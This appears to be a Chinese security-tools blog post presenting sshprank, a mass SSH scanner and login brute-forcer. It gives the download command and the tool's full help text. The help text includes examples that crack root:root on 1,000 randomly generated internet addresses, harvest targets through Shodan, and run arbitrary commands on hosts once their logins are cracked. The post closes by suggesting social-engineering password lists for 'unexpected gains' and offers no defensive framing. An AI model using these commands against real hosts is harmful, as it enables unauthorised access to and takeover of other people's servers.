一款高速SSH爆破扫描器:sshprank
- 发表于
- 安全工具
sshprank SSH扫描器
一款使用python-masscan和shodan模块的高速SSH大规模扫描器,登录破解和banner抓取工具。
下载
1 |
git clone https://github.com/noptrix/sshprank.git |
使用
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 |
[ hacker@blackarch ~ ]$ sshprank -H __ __ __________/ /_ ____ _________ _____ / /__ / ___/ ___/ __ \/ __ \/ ___/ __ `/ __ \/ //_/ (__ |__ ) / / / /_/ / / / /_/ / / / / ,< /____/____/_/ /_/ .___/_/ \__,_/_/ /_/_/|_| /_/ --== [ by nullsecurity.net ] ==-- usage sshprank <mode> [opts] | <misc> modes -h <host:[ports]> - single host to crack. multiple ports can be seperated by comma, e.g.: 22,2022,22222 (default port: 22) -l <file> - list of hosts to crack. format: <host>[:ports]. multiple ports can be seperated by comma (default port: 22) -m <opts> [-r <num>] - pass arbitrary masscan opts, portscan given hosts and crack for logins. found sshd services will be saved to 'sshds.txt' in supported format for '-l' option and even for '-b'. use '-r' for generating random ipv4 addresses rather than scanning given hosts. these options are always on: '-sS -oX - --open'. NOTE: if you intent to use the '--banner' option then you need to specify '--source-ip <some_ipaddr>' which is needed by masscan. better check masscan options! -s <str;page;lim> - search ssh servers using shodan and crack logins. see examples below. note: you need a better API key than this one i offer in order to search more than 100 (= 1 page) ssh servers. so if you use this one use '1' for 'page'. don't bother me with this, bitch -b <file> - list of hosts to grab sshd banner from format: <host>[:ports]. multiple ports can be seperated by comma (default port: 22) options -r <num> - generate <num> random ipv4 addresses, check for open sshd port and crack for login (only with -m option!) -c <cmd> - execute this <cmd> on host if login was cracked -u <user> - single username (default: root) -U <file> - list of usernames -p - single password (default: root) -P <file> - list of passwords -C <file> - list of user:pass combination -x <num> - num threads for parallel host crack (default: 20) -S <num> - num threads for parallel service crack (default: 20) -X <num> - num threads for parallel login crack (default: 20) -B <num> - num threads for parallel banner grabbing (default: 70) -T <sec> - num sec for connect timeout (default: 2s) -R <sec> - num sec for (banner) read timeout (default: 2s) -o <file> - write found logins to file. format: <host>:<port>:<user>:<pass> (default: owned.txt) -e - exit after first login was found. continue with other hosts instead (default: off) -v - verbose mode. show found logins, sshds, etc. (default: off) misc -H - print help -V - print version information examples # crack targets from a given list with user admin, pw-list and 20 host-threads $ sshprank -l sshds.txt -u admin -P /tmp/passlist.txt -x 20 # first scan then crack from founds ssh services $ sudo sshprank -m '-p22,2022 --rate 5000 --source-ip 192.168.13.37 \ --range 192.168.13.1/24' # generate 1k random ipv4 addresses, then port-scan (tcp/22 here) with 1k p/s # and crack login 'root:root' on found sshds $ sudo sshprank -m '-p22 --rate=1000' -r 1000 -v # search 50 ssh servers via shodan and crack logins using 'root:root' against # found sshds $ sshprank -s 'SSH;1;50' # grab banners and output to file with format supported for '-l' option $ sshprank -b hosts.txt > sshds2.txt |
内置了user和pass字典,你可以扩容或定制,有时配合社会工程学弱口令密码字典生成脚本可能会有意想不到的收获。
原文连接:一款高速SSH爆破扫描器:sshprank
所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。